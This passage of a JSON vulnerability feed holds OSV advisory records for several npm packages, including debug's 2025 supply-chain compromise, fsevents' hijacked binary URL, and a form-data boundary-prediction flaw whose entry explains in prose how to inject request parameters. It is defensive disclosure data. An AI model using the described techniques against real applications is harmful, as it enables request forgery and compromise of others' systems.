tracking issue (applies to all packages affected in the breach): https://github.com/debug-js/debug/issues/1005", "affected": [ { "package": { "name": "debug", "ecosystem": "npm", "purl": "pkg:npm/debug" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.4.2" }, { "fixed": "4.4.3" } ] } ], "versions": [ "4.4.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-4x49-vf9v-38px/GHSA-4x49-vf9v-38px.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/debug-js/debug/security/advisories/GHSA-4x49-vf9v-38px" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59144" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/issues/1005" }, { "type": "PACKAGE", "url": "https://github.com/debug-js/debug" }, { "type": "WEB", "url": "https://socket.dev/blog/npm-author-qix-compromised-in-major-supply-chain-attack" }, { "type": "WEB", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "WEB", "url": "https://www.ox.security/blog/npm-packages-compromised" } ], "database_specific": { "cwe_ids": [ "CWE-506" ], "github_reviewed": true, "github_reviewed_at": "2025-09-15T21:30:55Z", "nvd_published_at": "2025-09-15T20:15:39Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:A/U:Red" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9vvw-cc9w-f27h", "published": "2023-01-09T12:30:19Z", "modified": "2023-11-08T03:59:17.780578Z", "aliases": [ "CVE-2017-20165" ], "summary": "debug Inefficient Regular Expression Complexity vulnerability", "details": "A vulnerability classified as problematic has been found in debug-js debug up to 3.0.x. This affects the function useColors of the file src/node.js. The manipulation of the argument str leads to inefficient regular expression complexity. Upgrading to version 3.1.0 is able to address this issue. The name of the patch is c38a0166c266a679c8de012d4eaccec3f944e685. It is recommended to upgrade the affected component. The identifier VDB-217665 was assigned to this vulnerability. The patch has been backported to the 2.6.x branch in version 2.6.9.", "affected": [ { "package": { "name": "debug", "ecosystem": "npm", "purl": "pkg:npm/debug" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.1.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-9vvw-cc9w-f27h/GHSA-9vvw-cc9w-f27h.json" } }, { "package": { "name": "debug", "ecosystem": "npm", "purl": "pkg:npm/debug" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.6.9" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-9vvw-cc9w-f27h/GHSA-9vvw-cc9w-f27h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20165" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/pull/504" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/commit/c38a0166c266a679c8de012d4eaccec3f944e685" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/commit/f53962e944a87e6ca9bb622a2a12dffc22a9bb5a" }, { "type": "PACKAGE", "url": "https://github.com/debug-js/debug" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/releases/tag/2.6.9" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/releases/tag/3.1.0" }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.217665" }, { "type": "WEB", "url": "https://vuldb.com/?id.217665" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2023-01-10T21:49:01Z", "nvd_published_at": "2023-01-09T10:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gxpj-cx7g-858c", "published": "2018-08-09T20:18:07Z", "modified": "2024-03-25T19:01:23Z", "aliases": [ "CVE-2017-16137" ], "related": [ "CGA-j9cp-p46h-5p44" ], "summary": "Regular Expression Denial of Service in debug", "details": "Affected versions of `debug` are vulnerable to regular expression denial of service when untrusted user input is passed into the `o` formatter. \n\nAs it takes 50,000 characters to block the event loop for 2 seconds, this issue is a low severity issue.\n\nThis was later re-introduced in version v3.2.0, and then repatched in versions 3.2.7 and 4.3.1.\n\n## Recommendation\n\nVersion 2.x.x: Update to version 2.6.9 or later.\nVersion 3.1.x: Update to version 3.1.0 or later.\nVersion 3.2.x: Update to version 3.2.7 or later.\nVersion 4.x.x: Update to version 4.3.1 or later.", "affected": [ { "package": { "name": "debug", "ecosystem": "npm", "purl": "pkg:npm/debug" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.6.9" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/08/GHSA-gxpj-cx7g-858c/GHSA-gxpj-cx7g-858c.json" } }, { "package": { "name": "debug", "ecosystem": "npm", "purl": "pkg:npm/debug" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.1.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/08/GHSA-gxpj-cx7g-858c/GHSA-gxpj-cx7g-858c.json" } }, { "package": { "name": "debug", "ecosystem": "npm", "purl": "pkg:npm/debug" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.2.0" }, { "fixed": "3.2.7" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/08/GHSA-gxpj-cx7g-858c/GHSA-gxpj-cx7g-858c.json" } }, { "package": { "name": "debug", "ecosystem": "npm", "purl": "pkg:npm/debug" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.3.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/08/GHSA-gxpj-cx7g-858c/GHSA-gxpj-cx7g-858c.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16137" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/issues/797" }, { "type": "WEB", "url": "https://github.com/visionmedia/debug/issues/501" }, { "type": "WEB", "url": "https://github.com/visionmedia/debug/pull/504" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/commit/4e2150207c568adb9ead8f4c4528016081c88020" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/commit/71169065b5262f9858ac78cc0b688c84a438f290" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/commit/b6d12fdbc63b483e5c969da33ea6adc09946b5ac" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/commit/f53962e944a87e6ca9bb622a2a12dffc22a9bb5a" }, { "type": "PACKAGE", "url": "https://github.com/visionmedia/debug" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8ba4c628fba7181af58817d452119481adce4ba92e889c643e4c7dd3@%3Ccommits.netbeans.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb5ac16fad337d1f3bb7079549f97d8166d0ef3082629417c39f12d63@%3Cnotifications.netbeans.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:38:18Z", "nvd_published_at": null, "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "MAL-2025-46974", "published": "2025-09-08T14:26:51Z", "modified": "2025-09-16T06:44:36.384185Z", "aliases": [ "CVE-2025-59144", "GHSA-4x49-vf9v-38px", "GHSA-8mgj-vmr8-frr6" ], "summary": "Malicious code in debug (npm)", "details": "The package was compromised and malicious code added.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: ghsa-malware (558d1dda312e85212121f4ed15340349f780f5e40d6685c3687648bbb2924381)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n", "affected": [ { "package": { "name": "debug", "ecosystem": "npm", "purl": "pkg:npm/debug" }, "versions": [ "4.4.2" ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/debug/MAL-2025-46974.json" } } ], "references": [ { "type": "ARTICLE", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "ARTICLE", "url": "https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/" }, { "type": "WEB", "url": "https://github.com/github/advisory-database/issues/6099" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-8mgj-vmr8-frr6" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/security/advisories/GHSA-4x49-vf9v-38px" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-8mgj-vmr8-frr6", "import_time": "2025-09-09T00:35:48.408037926Z", "modified_time": "2025-09-08T17:54:47Z", "sha256": "558d1dda312e85212121f4ed15340349f780f5e40d6685c3687648bbb2924381", "source": "ghsa-malware", "versions": [ "4.4.2" ] }, { "id": "GHSA-8mgj-vmr8-frr6", "import_time": "2025-09-10T00:34:05.220545432Z", "modified_time": "2025-09-08T17:54:47Z", "sha256": "8107bf621a06423d1aae59bd505317ddf2bb8b03ebd71b4a35ce7a0059cad82a", "source": "ghsa-malware", "versions": [ "4.4.2" ] }, { "id": "GHSA-8mgj-vmr8-frr6", "import_time": "2025-09-11T00:34:35.461493997Z", "modified_time": "2025-09-10T17:47:46Z", "sha256": "d2b85998dbc6f082e6c96883e10d26afc54fa634507ab7c04adc926f6fc21de5", "source": "ghsa-malware", "versions": [ "4.4.2" ] }, { "id": "GHSA-8mgj-vmr8-frr6", "import_time": "2025-09-12T00:33:58.045928418Z", "modified_time": "2025-09-10T17:47:46Z", "sha256": "a55920f514ec4e15d3d2bdf89455777f247a624a1a1acf4f909726b3b6514c46", "source": "ghsa-malware", "versions": [ "4.4.2" ] }, { "id": "GHSA-8mgj-vmr8-frr6", "import_time": "2025-09-16T00:34:25.612039797Z", "modified_time": "2025-09-15T23:53:26Z", "sha256": "3bb0e19fac14a7d83fd61d2fc633bedf670deade726ba1a414db1a20f2f85ff3", "source": "ghsa-malware", "versions": [ "4.4.2" ] }, { "id": "GHSA-8mgj-vmr8-frr6", "import_time": "2025-09-17T00:07:09.274173202Z", "modified_time": "2025-09-15T23:53:26Z", "sha256": "55de988936dbe50449ae4dddd6b0bb821bde8f055aaea6e92f61f7d19958b212", "source": "ghsa-malware", "versions": [ "4.4.2" ] }, { "id": "GHSA-8mgj-vmr8-frr6", "import_time": "2025-09-17T00:34:59.109596052Z", "modified_time": "2025-09-15T23:53:26Z", "sha256": "e905a7ba17420439ee063d451043a50b951d28a69bfe4bc90c4f8350c2a26c37", "source": "ghsa-malware", "versions": [ "4.4.2" ] } ] }, "credits": [ { "name": "Amazon Inspector", "contact": [ "actran@amazon.com" ], "type": "FINDER" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q5c4-39f5-m68j", "published": "2018-07-24T20:00:17Z", "modified": "2023-11-08T03:59:00.254876Z", "aliases": [ "CVE-2017-16023" ], "summary": "Regular Expression Denial of Service in decamelize", "details": "Affected versions of `decamelize` are susceptible to a denial of service vulnerability when user input is passed directly into `decamelize`.\n\n\n\n\n## Recommendation\n\nUpdate to version 1.1.2 or later.", "affected": [ { "package": { "name": "decamelize", "ecosystem": "npm", "purl": "pkg:npm/decamelize" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.1.0" }, { "fixed": "1.1.2" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.1.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-q5c4-39f5-m68j/GHSA-q5c4-39f5-m68j.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16023" }, { "type": "WEB", "url": "https://github.com/sindresorhus/decamelize/issues/5" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-q5c4-39f5-m68j" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/308" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:51:05Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h6ch-v84p-w6p9", "published": "2019-06-13T18:58:54Z", "modified": "2021-02-24T19:27:02Z", "related": [ "CGA-5cqv-mm6m-mf38", "CGA-5mc2-7mmg-hm4f", "CGA-6292-xfg3-c39h", "CGA-c4qh-jfrh-49m7", "CGA-f5r7-qrx9-rxrx", "CGA-v24c-cq4m-759w", "CGA-v9cq-gwgg-6x89", "CGA-vrj4-44qq-4856" ], "summary": "Regular Expression Denial of Service (ReDoS)", "details": "A vulnerability was found in diff before v3.5.0, the affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks.", "affected": [ { "package": { "name": "diff", "ecosystem": "npm", "purl": "pkg:npm/diff" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.5.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-h6ch-v84p-w6p9/GHSA-h6ch-v84p-w6p9.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/kpdecker/jsdiff/commit/2aec4298639bf30fb88a00b356bf404d3551b8c0" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1552148" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:diff:20180305" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1631" }, { "type": "WEB", "url": "https://www.whitesourcesoftware.com/vulnerability-database/WS-2018-0590" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2019-06-13T18:54:38Z", "nvd_published_at": null, "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-qrmc-fj45-qfc2", "published": "2019-02-07T18:03:28Z", "modified": "2023-11-08T04:00:01.054529Z", "aliases": [ "CVE-2018-16492" ], "summary": "Prototype Pollution in extend", "details": "Versions of `extend` prior to 3.0.2 (for 3.x) and 2.0.2 (for 2.x) are vulnerable to Prototype Pollution. The `extend()` function allows attackers to modify the prototype of Object causing the addition or modification of an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nIf you're using `extend` 3.x upgrade to 3.0.2 or later.\nIf you're using `extend` 2.x upgrade to 2.0.2 or later.", "affected": [ { "package": { "name": "extend", "ecosystem": "npm", "purl": "pkg:npm/extend" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-qrmc-fj45-qfc2/GHSA-qrmc-fj45-qfc2.json" } }, { "package": { "name": "extend", "ecosystem": "npm", "purl": "pkg:npm/extend" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-qrmc-fj45-qfc2/GHSA-qrmc-fj45-qfc2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-16492" }, { "type": "WEB", "url": "https://hackerone.com/reports/381185" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-qrmc-fj45-qfc2" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/996" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:52:44Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-3wf4-68gx-mph8", "published": "2024-11-18T12:30:42Z", "modified": "2025-07-23T22:12:58Z", "aliases": [ "CVE-2024-11023" ], "summary": "Firebase JavaScript SDK allows attackers to manipulate the \"_authTokenSyncURL\" to point to their own server", "details": "Firebase JavaScript SDK utilizes a \"FIREBASE_DEFAULTS\" cookie to store configuration data, including an \"_authTokenSyncURL\" field used for session synchronization. If this cookie field is preset via an attacker by any other method, the attacker can manipulate the \"_authTokenSyncURL\" to point to their own server and it would allow am actor to capture user session data transmitted by the SDK. We recommend upgrading Firebase JS SDK at least to 10.9.0.", "affected": [ { "package": { "name": "firebase", "ecosystem": "npm", "purl": "pkg:npm/firebase" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "10.9.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-3wf4-68gx-mph8/GHSA-3wf4-68gx-mph8.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-11023" }, { "type": "WEB", "url": "https://github.com/firebase/firebase-js-sdk/pull/8056" }, { "type": "WEB", "url": "https://github.com/firebase/firebase-js-sdk/commit/245dd26e19b6c16aca7e1b7e597ed5784c2984ba" }, { "type": "WEB", "url": "https://firebase.google.com/support/release-notes/js#version_1090_-_march_14_2024" }, { "type": "PACKAGE", "url": "https://github.com/firebase/firebase-js-sdk" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2024-11-18T20:04:30Z", "nvd_published_at": "2024-11-18T11:15:05Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:L/VI:L/VA:L/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2j2x-2gpw-g8fm", "published": "2022-12-25T21:30:22Z", "modified": "2023-11-08T04:03:48.649741Z", "aliases": [ "CVE-2020-36632" ], "summary": "flat vulnerable to Prototype Pollution", "details": "flat helps flatten/unflatten nested Javascript objects. A vulnerability, which was classified as critical, was found in hughsk flat up to 5.0.0. This affects the function unflatten of the file index.js. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). It is possible to initiate the attack remotely. Upgrading to version 5.0.1 can address this issue. The name of the patch is 20ef0ef55dfa028caddaedbcb33efbdb04d18e13. It is recommended to upgrade the affected component. The identifier VDB-216777 was assigned to this vulnerability.", "affected": [ { "package": { "name": "flat", "ecosystem": "npm", "purl": "pkg:npm/flat" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.0.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-2j2x-2gpw-g8fm/GHSA-2j2x-2gpw-g8fm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36632" }, { "type": "WEB", "url": "https://github.com/hughsk/flat/issues/105" }, { "type": "WEB", "url": "https://github.com/hughsk/flat/pull/106" }, { "type": "WEB", "url": "https://github.com/hughsk/flat/commit/20ef0ef55dfa028caddaedbcb33efbdb04d18e13" }, { "type": "PACKAGE", "url": "https://github.com/hughsk/flat" }, { "type": "WEB", "url": "https://github.com/hughsk/flat/releases/tag/5.0.1" }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.216777" }, { "type": "WEB", "url": "https://vuldb.com/?id.216777" } ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2022-12-30T16:27:14Z", "nvd_published_at": "2022-12-25T20:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-fjxv-7rqg-78g4", "published": "2025-07-21T19:04:54Z", "modified": "2025-11-03T21:34:08Z", "aliases": [ "CVE-2025-7783" ], "related": [ "CGA-35hh-78jw-8mmq", "CGA-9m6x-qcrx-9xfj", "CGA-cvhq-qgx3-vfx9", "CGA-g2fp-rgfq-2hjj", "CGA-h6v7-23w8-2vw8", "CGA-mp9r-pq3p-q3qc", "CGA-pgwm-362h-3mjh", "CGA-qvfw-fcfj-g5xq", "CGA-rvcj-gcgm-25q3", "CGA-xvgg-cqm9-vxh5", "CVE-2025-7783" ], "summary": "form-data uses unsafe random function in form-data for choosing boundary", "details": "### Summary\n\nform-data uses `Math.random()` to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:\n1. can observe other values produced by Math.random in the target application, and\n2. can control one field of a request made using form-data\n\nBecause the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.\n\nThis is largely the same vulnerability as was [recently found in `undici`](https://hackerone.com/reports/2913312) by [`parrot409`](https://hackerone.com/parrot409?type=user) -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.\n\n### Details\n\nThe culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347\n\nAn attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a `x-request-id` header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. `Math.random()` is a fine place to get these sorts of IDs (in fact, [opentelemetry uses Math.random for this purpose](https://github.com/open-telemetry/opentelemetry-js/blob/2053f0d3a44631ade77ea04f656056a2c8a2ae76/packages/opentelemetry-sdk-trace-base/src/platform/node/RandomIdGenerator.ts#L22))\n\n### PoC\n\nPoC here: https://github.com/benweissmann/CVE-2025-7783-poc\n\nInstructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID). \n\n### Impact\n\nFor an application to be vulnerable, it must:\n- Use `form-data` to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)\n- Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values. \n\nIf an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.", "affected": [ { "package": { "name": "form-data", "ecosystem": "npm", "purl": "pkg:npm/form-data" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.5.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-fjxv-7rqg-78g4/GHSA-fjxv-7rqg-78g4.json" } }, { "package": { "name": "form-data", "ecosystem": "npm", "purl": "pkg:npm/form-data" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.0.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-fjxv-7rqg-78g4/GHSA-fjxv-7rqg-78g4.json" } }, { "package": { "name": "form-data", "ecosystem": "npm", "purl": "pkg:npm/form-data" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.0.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-fjxv-7rqg-78g4/GHSA-fjxv-7rqg-78g4.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/form-data/form-data/security/advisories/GHSA-fjxv-7rqg-78g4" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7783" }, { "type": "WEB", "url": "https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0" }, { "type": "WEB", "url": "https://github.com/benweissmann/CVE-2025-7783-poc" }, { "type": "PACKAGE", "url": "https://github.com/form-data/form-data" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00023.html" } ], "database_specific": { "cwe_ids": [ "CWE-330" ], "github_reviewed": true, "github_reviewed_at": "2025-07-21T19:04:54Z", "nvd_published_at": "2025-07-18T17:15:44Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8r6j-v8pm-fqw3", "published": "2023-10-06T21:30:49Z", "modified": "2023-11-08T04:13:38.062107Z", "aliases": [ "CVE-2023-45311" ], "summary": "Code injection in fsevents", "details": "fsevents before 1.2.11 depends on the https://fsevents-binaries.s3-us-west-2.amazonaws.com URL, which might allow an adversary to execute arbitrary code if any JavaScript project (that depends on fsevents) distributes code that was obtained from that URL at a time when it was controlled by an adversary.", "affected": [ { "package": { "name": "fsevents", "ecosystem": "npm", "purl": "pkg:npm/fsevents" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.2.11" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.2.10", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-8r6j-v8pm-fqw3/GHSA-8r6j-v8pm-fqw3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45311" }, { "type": "WEB", "url": "https://github.com/fsevents/fsevents/commit/909af26846834642c81d19f4148afa3b7557b058" }, { "type": "WEB", "url": "https://github.com/atlassian/moo/blob/56ccbdd41b493332bc2cd7a4097a5802594cdb9c/package-lock.json#L1901-L1902" }, { "type": "WEB", "url": "https://github.com/atlassian/react-immutable-proptypes/blob/ddb9fa5194b931bf7528eb4f2c0a8c3434f70edd/package-lock.json#L153" }, { "type": "WEB", "url": "https://github.com/cloudflare/authr/blob/3f6129d97d06e61033a7f237d84e35e678db490f/ts/package-lock.json#L1512" }, { "type": "WEB", "url": "https://github.com/cloudflare/hugo-cloudflare-docs/blob/e0f7cfa195af8ef1bfa51a487be7d34ba298ed06/package-lock.json#L494" }, { "type": "WEB", "url": "https://github.com/cloudflare/redux-grim/blob/b652f99f95fb16812336073951adc5c5a93e2c23/package-lock.json#L266-L267" }, { "type": "WEB", "url": "https://github.com/cloudflare/serverless-cloudflare-workers/blob/e95e1e9c9770ed9a3d9480c1fa73e64391268354/package-lock.json#L737" }, { "type": "PACKAGE", "url": "https://github.com/fsevents/fsevents" }, { "type": "WEB", "url": "https://github.com/fsevents/fsevents/compare/v1.2.10...v1.2.11" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JS-FSEVENTS-5487987" } ], "database_specific": { "cwe_ids": [ "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2023-10-09T21:35:16Z", "nvd_published_at": "2023-10-06T21:15:10Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "MAL-2023-462", "published": "2023-04-27T19:20:00Z", "modified": "2023-11-08T04:24:32.787594Z", "aliases": [ "GHSA-xv2f-5jw4-v95m" ], "summary": "Malicious code in fsevents (npm)", "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: ghsa-malware (acdc3ae57250fab51aeff6e3938ed40197a1b74eb688a72cd5d7eee0c77a7167)\nThis advisory is intended to inform the npm ecosystem with details to resolve a third-party malware incident that may have impacted your infrastructure if you are directly or transitively dependent on the [fsevents](https://www.npmjs.com/package/fsevents) npm package.\n\n## Overview\n\n[fsevents](https://www.npmjs.com/package/fsevents) v1.0.0 \u003c= v1.2.10 downloaded binary executables that contained unintended code due to an expired cloud storage resource being reclaimed by a third party.\n\n## Details\n\nThe [fsevents npm package](https://www.npmjs.com/package/fsevents) v1.0.0 through v1.2.10 attempts to fetch a pre-built binary executable artifact (fse.node) from cloud storage. If this fetch fails, fsevents v1.x will attempt to build this artifact directly from source.\n\nVersion 1.x of fsevents has been deprecated for several years and as a result the aforementioned cloud storage resource namespace was available for 